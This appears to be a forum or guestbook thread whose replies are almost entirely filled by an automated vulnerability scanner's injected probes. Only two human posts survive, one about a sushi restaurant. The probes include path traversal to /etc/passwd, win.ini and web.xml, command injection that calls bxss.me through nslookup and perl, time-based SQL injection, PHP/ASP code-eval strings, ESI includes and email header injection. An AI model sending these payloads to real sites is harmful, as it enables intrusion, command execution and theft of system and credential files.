&echo cbpjha$()\ wkyldg\nz^xyu||a #' &echo cbpjha$()\ wkyldg\nz^xyu||a #|" &echo cbpjha$()\ wkyldg\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo vmxmch$()\ vmsmzm\nz^xyu||a #' |echo vmxmch$()\ vmsmzm\nz^xyu||a #|" |echo vmxmch$()\ vmsmzm\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
(nslookup hitdkmzqwpkaf23dc2.bxss.me||perl -e "gethostbyname('hitdkmzqwpkaf23dc2.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
$(nslookup hittenwzpfjdv8c58d.bxss.me||perl -e "gethostbyname('hittenwzpfjdv8c58d.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&nslookup hitobtyyqsqei58a20.bxss.me&'\"`0&nslookup hitobtyyqsqei58a20.bxss.me&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
&(nslookup hitczsvkhgzoma1ce9.bxss.me||perl -e "gethostbyname('hitczsvkhgzoma1ce9.bxss.me')")&'\"`0&(nslookup hitczsvkhgzoma1ce9.bxss.me||perl -e "gethostbyname('hitczsvkhgzoma1ce9.bxss.me')")&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
Http://bxss.me/t/fit.txt
re: guest
bxss.me/t/xss.html?%00
re: guest
|(nslookup hitftxexevuzs6e17b.bxss.me||perl -e "gethostbyname('hitftxexevuzs6e17b.bxss.me')")
re: guest
"+"A".concat(70-3).concat(22*4).concat(108).concat(87).concat(109).concat(72)+(require"socket"
Socket.gethostbyname("hitca"+"omtgicnr3fe3b.bxss.me.")[3].to_s)+"
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
`(nslookup hitrxmnffdhux4a04a.bxss.me||perl -e "gethostbyname('hitrxmnffdhux4a04a.bxss.me')")`
re: guest
'+'A'.concat(70-3).concat(22*4).concat(113).concat(74).concat(100).concat(78)+(require'socket'
Socket.gethostbyname('hitgf'+'kidtzwss81f68.bxss.me.')[3].to_s)+'
re: guest
file:///etc/passwd
re: guest
/etc/shells
re: guest
;(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")|(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")&(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
c:/windows/win.ini
re: guest
/WEB-INF/web.xml
re: guest
bxss.me
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
';print(md5(31337));$a='
re: guest
/../../../../../../../../../../boot.ini
re: guest
'"
re: guest
";print(md5(31337));$a="
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
<!--
re: guest
${@print(md5(31337))}
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
${@print(md5(31337))}\
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
'.print(md5(31337)).'
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+689-689-1=0+0+0+1 --
re: guest
-1 OR 3+689-689-1=0+0+0+1 --
re: guest
-1 OR 2+799-799-1=0+0+0+1
re: guest
-1 OR 3+799-799-1=0+0+0+1
re: guest
-1' OR 2+279-279-1=0+0+0+1 --
re: guest
-1' OR 3+279-279-1=0+0+0+1 --
re: guest
-1' OR 2+921-921-1=0+0+0+1 or 'oyikqFLx'='
re: guest
-1' OR 3+921-921-1=0+0+0+1 or 'oyikqFLx'='
re: guest
-1" OR 2+416-416-1=0+0+0+1 --
re: guest
-1" OR 3+416-416-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
vh9UXtK4'; waitfor delay '0:0:15' --
re: guest
-5 OR 664=(SELECT 664 FROM PG_SLEEP(15))--
re: guest
-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: guest
-1)) OR 67=(SELECT 67 FROM PG_SLEEP(15))--
They posted it on Instagram. You can just do a Google translate of it.
re: guest
Cml81tD2
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+878-878-1=0+0+0+1
re: guest
-1 OR 3+878-878-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
xLZ49xzn'; waitfor delay '0:0:15' --
re: guest
-5 OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: guest
-5) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
re: guest
-1)) OR 604=(SELECT 604 FROM PG_SLEEP(15))--
re: guest
3msgUo2M' OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: guest
Ug7JkMvI') OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: guest
l3uoZajM')) OR 123=(SELECT 123 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@r3Rpj
re: guest
ZWG2l6qG
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+231-231-1=0+0+0+1
re: guest
-1 OR 3+231-231-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
wNN9rRjZ'; waitfor delay '0:0:15' --
re: guest
-5 OR 809=(SELECT 809 FROM PG_SLEEP(15))--
re: guest
-5) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
-1)) OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: guest
3Ru3WPfc' OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: guest
oYkuwb02') OR 756=(SELECT 756 FROM PG_SLEEP(15))--
re: guest
GyqYdIVU')) OR 549=(SELECT 549 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@93nsv
Hi! Have anyone visited Obana recently?
Heard a lot of good things about his neta but I would like to know his shari style. Thanks!
re: guest
1Cixklg6N4O
re: guest
response.write(9324373*9590798)
re: guest
'+response.write(9324373*9590798)+'
re: guest
"+response.write(9324373*9590798)+"
re: guest
%0abcc:074625.67-22375.67.689cd.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
to@example.com>%0d%0abcc:074625.67-22376.67.689cd.19990.2@bxss.me
re: guest
${10000474+9999683}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
echo ycdcye$()\ jtpaml\nz^xyu||a #' &echo ycdcye$()\ jtpaml\nz^xyu||a #|" &echo ycdcye$()\ jtpaml\nz^xyu||a #
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
&echo rqgnnk$()\ cthivv\nz^xyu||a #' &echo rqgnnk$()\ cthivv\nz^xyu||a #|" &echo rqgnnk$()\ cthivv\nz^xyu||a #
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
|echo gzhkeb$()\ vhmglm\nz^xyu||a #' |echo gzhkeb$()\ vhmglm\nz^xyu||a #|" |echo gzhkeb$()\ vhmglm\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
(nslookup hitfoishiibpc97eaf.bxss.me||perl -e "gethostbyname('hitfoishiibpc97eaf.bxss.me')")
re: guest
/etc/passwd
re: guest
$(nslookup hitiuhldbsqsz182bf.bxss.me||perl -e "gethostbyname('hitiuhldbsqsz182bf.bxss.me')")
re: guest
%2fetc%2fpasswd
re: guest
&nslookup hitqvyrgsrzmn800bf.bxss.me&'\"`0&nslookup hitqvyrgsrzmn800bf.bxss.me&`'
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&(nslookup hithpyomyiqxbea885.bxss.me||perl -e "gethostbyname('hithpyomyiqxbea885.bxss.me')")&'\"`0&(nslookup hithpyomyiqxbea885.bxss.me||perl -e "gethostbyname('hithpyomyiqxbea885.bxss.me')")&`'
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
|(nslookup hitqkplaamjbz178d7.bxss.me||perl -e "gethostbyname('hitqkplaamjbz178d7.bxss.me')")
re: guest
Http://bxss.me/t/fit.txt
re: guest
`(nslookup hitnfqepozrbsfc4e3.bxss.me||perl -e "gethostbyname('hitnfqepozrbsfc4e3.bxss.me')")`
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
;(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")|(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")&(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
/etc/shells
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.